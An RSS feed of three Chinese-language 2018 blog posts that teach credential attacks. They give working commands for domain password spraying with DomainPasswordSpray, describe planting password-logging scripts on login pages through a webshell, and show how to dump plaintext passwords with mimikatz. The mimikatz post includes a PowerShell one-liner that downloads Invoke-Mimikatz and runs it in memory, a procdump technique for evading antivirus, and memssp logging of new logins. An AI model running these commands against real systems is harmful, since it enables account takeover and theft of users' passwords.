<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>密码 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E5%AF%86%E7%A0%81/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Mon, 13 Aug 2018 15:46:29 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>域渗透之DomainPasswordSpray</title>
		<link>/tools/411.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 08 May 2018 14:12:00 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[域渗透]]></category>
		<category><![CDATA[密码]]></category>
		<category><![CDATA[枚举]]></category>
		<category><![CDATA[用户]]></category>
		<guid isPermaLink="false">/?p=351</guid>

					<description><![CDATA[前言 在拿到一台内网服务器之后，想要进行进一步的域渗透时，如果在内网中有着庞大的用户列表，你会怎么办？ powershell脚本 DomainPasswordSpray是一个pow...]]></description>
										<content:encoded><![CDATA[<h1>前言</h1>
<p>在拿到一台内网服务器之后，想要进行进一步的<span class="wpcom_tag_link"><a href="/tags/%e5%9f%9f%e6%b8%97%e9%80%8f" title="域渗透" target="_blank">域渗透</a></span>时，如果在内网中有着庞大的<span class="wpcom_tag_link"><a href="/tags/%e7%94%a8%e6%88%b7" title="用户" target="_blank">用户</a></span>列表，你会怎么办？</p>
<h1>powershell脚本</h1>
<p><strong>DomainPasswordSpray</strong>是一个powershell脚本，主要原理是先来抓取域用户账号，然后指定<span class="wpcom_tag_link"><a href="/tags/%e5%af%86%e7%a0%81" title="密码" target="_blank">密码</a></span>字典进行域认证。认证通过的就是密码正确的了。</p>
<p><a href="https://github.com/dafthack/DomainPasswordSpray">Github地址</a></p>
<p>贴出了<a href="http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt">@倾旋大佬优化后的ps1脚本</a></p>
<h1>简单使用</h1>
<pre><code class="lang-powershell">Invoke-DomainPasswordSpray -Password chabug</code></pre>
<p>这个命令会从当前的域中生成用户列表，然后将每个用户名和<code>chabug</code>的密码组合进行<span class="wpcom_tag_link"><a href="/tags/%e6%9e%9a%e4%b8%be" title="枚举" target="_blank">枚举</a></span>认证。</p>
<h1>参数详解</h1>
<ul>
<li><code>Domain</code> 指定要测试的域名</li>
<li><code>RemoveDisabled</code> 尝试从用户列表删除禁用的账户</li>
<li><code>RemovePotentialLockouts</code> 删除锁定账户</li>
<li><code>UserList</code> 自定义用户列表(字典)。 如果未指定，这将自动从域中获取</li>
<li><code>Password</code> 指定单个密码进行口令测试</li>
<li><code>PasswordList</code> 指定一个密码字典</li>
<li><code>OutFile</code> 将结果保存到某个文件</li>
<li><code>Force</code> 当枚举出第一个后继续枚举，不询问</li>
</ul>
<h1>使用例子</h1>
<pre><code>C:\PS&gt; Get-DomainUserList</code></pre>
<p>该命令将从域中收集用户列表。</p>
<pre><code>C:\PS&gt; Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt</code></pre>
<p>该命令将收集域“域名”中的用户列表，包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写&#8220;入“userlist.txt”文件中</p>
<pre><code>C:\PS&gt; Invoke-DomainPasswordSpray -Password Winter2016</code></pre>
<p>该命令将会从域环境中获取用户名，然后逐个以密码<code>Winter2016</code>进行认证枚举</p>
<pre><code>C:\PS&gt; Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt</code></pre>
<p>该命令将会从<code>users.txt</code>中提取用户名，与<code>passlist.txt</code>中的密码对照成一对口令，进行域认证枚举，登录成功的结果将会输出到<code>sprayed-creds.txt</code></p>
<p><strong>希望对你的渗透之路有帮助。</strong></p>
<p>本文引用或涉及的文章链接：</p>
<p><a href="http://payloads.online/archivers/2018-05-02/1">http://payloads.online/archivers/2018-05-02/1</a></p>
<p><a href="http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt">http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt</a></p>
<p><a href="https://github.com/dafthack/DomainPasswordSpray">https://github.com/dafthack/DomainPasswordSpray</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>web 密码记录脚本</title>
		<link>/web/375.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 07 Mar 2018 09:44:31 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[密码]]></category>
		<category><![CDATA[脚本]]></category>
		<guid isPermaLink="false">/?p=279</guid>

					<description><![CDATA[@X1r0z https://exp10it.cn/index.php/archives/1058/ 写这些脚本主要是方便记录管理员的密码 通常为 md5+salt 或者为 强密码...]]></description>
										<content:encoded><![CDATA[<blockquote><p>@X1r0z <a href="https://exp10it.cn/index.php/archives/1058/">https://exp10it.cn/index.php/archives/1058/</a></p></blockquote>
<p>写这些<span class="wpcom_tag_link"><a href="/tags/%e8%84%9a%e6%9c%ac" title="脚本" target="_blank">脚本</a></span>主要是方便记录管理员的<span class="wpcom_tag_link"><a href="/tags/%e5%af%86%e7%a0%81" title="密码" target="_blank">密码</a></span></p>
<p>通常为 md5+salt 或者为 强密码 无法解密</p>
<p>需要上传至 webshell</p>
<p>脚本均已在本地测试成功</p>
<p>在对应的 login 文件上 include 即可</p>
<p>默认保存在同目录下的 pass.txt 记录所有 POST 变量</p>
<p>php</p>
<p>asp</p>
<p>aspx</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>密码抓取之mimikatz的妙用</title>
		<link>/web/350.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 08 Feb 2018 20:03:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[mimikatz]]></category>
		<category><![CDATA[密码]]></category>
		<guid isPermaLink="false">/?p=139</guid>

					<description><![CDATA[简介 mimikatz是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于A...]]></description>
										<content:encoded><![CDATA[<h1>简介</h1>
<p><a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a>是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录<span class="wpcom_tag_link"><a href="/tags/%e5%af%86%e7%a0%81" title="密码" target="_blank">密码</a></span>， lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中， 而<span class="wpcom_tag_link"><a href="/tags/mimikatz" title="mimikatz" target="_blank">mimikatz</a></span>正是通过对lsass的逆算获取到明文密码！也就是说只要你不重启电脑，就可以通过他获取到登陆密码，只限当前登陆系统！</p>
<h1>基本命令</h1>
<pre><code>cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords--获登陆用户信息及密码</code></pre>
<h1>实战抓取</h1>
<p>只需要运行两条命令：</p>
<pre><code>privilege::debug
sekurlsa::logonpasswords</code></pre>
<p><img src="/wp-content/uploads/2018/02/271983201.jpg" alt="1517989449.jpg" title="1517989449.jpg"></p>
<p>我们也可以用powershell来抓取，仅需一条命令：</p>
<pre><code>powershell &quot;IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz&quot;</code></pre>
<p><img src="/wp-content/uploads/2018/02/3356049102.jpg" alt="1517989566.jpg" title="1517989566.jpg"></p>
<h1>进阶</h1>
<h3>绕过杀软抓取密码</h3>
<ol>
<li>procdump</li>
</ol>
<p>利用 procdump 导出 lsass.exe 在内存里的数据，之后 mimikatz 本地读取 操作系统版本要一致<br /><img src="/wp-content/uploads/2018/02/3621667987.jpg" alt="1.jpg" title="1.jpg"></p>
<pre><code>sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords</code></pre>
<ol>
<li>Invoke-Mimikatz</li>
</ol>
<p>内存中执行 不会在本地储存文件，前提是要支持 powershell</p>
<pre><code>powershell &quot;IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz&quot;</code></pre>
<h3>其他小技巧</h3>
<p>若管理员有每过几天就改密码的习惯，但是mimikatz抓取到的密码都是老密码</p>
<p>用QuarksPwDump等抓的hash也是老hash，新密码却抓不到的情况下</p>
<p>可以使用以下方法尝试解决</p>
<pre><code>privilege::debug
misc::memssp</code></pre>
<p>记录的结果在<code>c:\windows\system32\mimilsa.log</code><br />每次验证都会记录,如 锁屏 等  重启失效</p>
<p>出现如上问题是因为管理一直没注销过，都是直接断开连接，lsass进程里面还吃存放的老的。</p>
<p>也可以直接logoff，但是这样会很明显。</p>
<p>更多关于mimikatz妙用的文章：<br /><a href="https://www.webshell.cc/5343.html">Mimikatz 使用小技巧</a><br /><a href="https://www.cnblogs.com/hookjoy/p/5203193.html">如何防御“神器”Mimikatz窃取系统密码？</a><br /><a href="http://blog.gentilkiwi.com/mimikatz">Blog de Gentil Kiwi</a><br /><a href="https://exp10it.cn/index.php/archives/819/">密码抓取神器 mimikatz</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
